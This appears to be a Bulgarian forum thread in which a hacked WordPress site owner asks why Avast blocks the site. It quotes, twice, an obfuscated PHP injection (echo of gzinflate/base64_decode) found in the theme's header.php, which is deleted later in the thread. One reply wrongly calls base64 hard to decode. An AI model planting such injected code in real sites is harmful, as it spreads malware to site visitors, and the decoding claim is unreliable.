Има ли вирус в този сайт или няма

rak

rak

Active Member
След три хаквания на сайта ми и почистването му от зловреден код, сега единствено аваст реагира и блокира сайта, а всички останали антивирусни не откриват проблем. Също и уеб мастър тул не открива зловреден софтуер в сайта. Колега от форума го оправи миналата седмица, след като беше заразен сайта. Сега не мога да разбера - има ли вирус в този сайт и как да излезе от полезрението на аваст като опасен? Сайта е radkahair.org
 
От: Има ли вирус в този сайт или няма

Сега се мъча да открия нещо из темата на блога, намерих ето това странно нещо, което нищо не ми говори -
<script type='text/javascript' src='http://radkahair.org/wp-includes/js/jquery/jquery.js?ver=1.7.2'></script>


<?php
#c3284d#
echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
#/c3284d#
wp_head(); ?>

Възможно ли е това да е проблема? Файла е в (header.php)
 
От: Има ли вирус в този сайт или няма

Ползвам microsoft security essentials.
Нищо не показва :)
 
От: Има ли вирус в този сайт или няма

За първи път ти отварям сайта, не съм влизал преди, но аваста ми не само ме предупреди, но и спря достъпа до сайта.
 
От: Има ли вирус в този сайт или няма

NOD не открива проблеми
 
От: Има ли вирус в този сайт или няма

Точно - само аваст го прави това нещо, одеве инсталирах нортън интернет секюрити и нищо. Сега изтрих горния код, явно в него е проблема, но ще ровя още.
 
От: Има ли вирус в този сайт или няма

при мен е ОК - с аваст съм
 
  • Like
Реакции: rak
От: Има ли вирус в този сайт или няма

rak каза:
...Сега изтрих горния код, явно в него е проблема, но ще ровя още.
Увеличете...

Сега вече аваста ме пусна в сайта.
 
От: Има ли вирус в този сайт или няма

И на мен аваст ми блокира сайта. Ето и резултата от сканирането:

Web server details
Scan for: http://radkahair.org
Hostname: radkahair.org
IP address: 91.196.125.125

System Details:
Running on: Apache

Web application details:
Application: WordPress - http://www.wordpress.org
Google Analytics installed: UA-6349206-1

Web application version:
WordPress version: WordPress
Wordpress version from source: 3.4.1
Wordpress Version 3.3 or 3.4 based on: http://radkahair.org/wp-includes/js/autosave.js
WordPress directory: http://radkahair.org/wp-content
WordPress theme: http://radkahair.org/wp-content/themes/Route/
Това виж та го оправи, да не те хакнат пак. Wordpress internal path: /home/radkahai/public_html/wp-content/themes/Route/index.php

Security report (No threats found):
check Blacklisted: No
check Malware: No
check Malicious javascript: No
check Malicious iFrames: No
check Drive-By Downloads: No
check Anomaly detection: No
check IE-only attacks: No
check Suspicious redirections: No
check Spam: No
 
  • Like
Реакции: rak
От: Има ли вирус в този сайт или няма

Е, може вече да е решен проблема тогава. Мерси много, смятах да изтрия темата и да я кача наново - тя е платена. Ама щом вече не реагира аваста, значи се е оправило положението. Какво излиза накрая - аваст ли е най-добрата антивирусна, че само тя усеща зловредния код?
 
От: Има ли вирус в този сайт или няма

rak каза:
Сега се мъча да открия нещо из темата на блога, намерих ето това странно нещо, което нищо не ми говори -
<script type='text/javascript' src='http://radkahair.org/wp-includes/js/jquery/jquery.js?ver=1.7.2'></script>


<?php
#c3284d#
echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
#/c3284d#
wp_head(); ?>

Възможно ли е това да е проблема? Файла е в (header.php)
Увеличете...

Няма как да се разбере дали е това, понеже е криптирано и не се знае какъв е кода.
 
От: Има ли вирус в този сайт или няма

Така, инсталирах току що аваст, ъпдейтна си дефинициите и отворих сайта - не реагира, всичко е вече наред. Благодаря на всички, които реагираха и обърнаха внимание на проблема ми.
 
От: Има ли вирус в този сайт или няма

Аз съм с аваст и нищо не казва, явно е добре вече.
 
От: Има ли вирус в този сайт или няма

rak каза:
Така, инсталирах току що аваст, ъпдейтна си дефинициите и отворих сайта - не реагира, всичко е вече наред. Благодаря на всички, които реагираха и обърнаха внимание на проблема ми.
Увеличете...

Няма проблем вече, може би това е било. Но си оправи дупката в темата
 
От: Има ли вирус в този сайт или няма

Надявам се, тези дни ще се заема с по-сериозно предпазване на сайта от хакване, сега само пет ip-та може да се логват, ще сменя правата на папките, ще търся информация как да действам, че ми писна, за три месеца - четири атаки.
 
От: Има ли вирус в този сайт или няма

nasko_f каза:
Няма проблем вече, може би това е било. Но си оправи дупката в темата
Увеличете...

Писах ти на лични, да дадеш съвет как да го оправя това, че нямам идея.
 
От: Има ли вирус в този сайт или няма

nasko_f каза:
Няма как да се разбере дали е това, понеже е криптирано и не се знае какъв е кода.
Увеличете...

Еми някой да декриптира base64 и да видим какво е, може да е "задна врата" и затова да го засича :)
 
От: Има ли вирус в този сайт или няма

brs каза:
Еми някой да декриптира base64 и да видим какво е, може да е "задна врата" и затова да го засича :)
Увеличете...

Толкова код в base64 надали ще може да се декриптне, или и да може ще трябва време.
 
От: Има ли вирус в този сайт или няма

Видя ли някъде base64_decode, eval и т.н. трия. Ако ще да е златна тема и да ми снася златни яйца.
Нищо скрито, кодирано и напъхано някъде не може да е добро.
 
Трябва да си влезнал или регистриран, за да отговориш тук.

Горе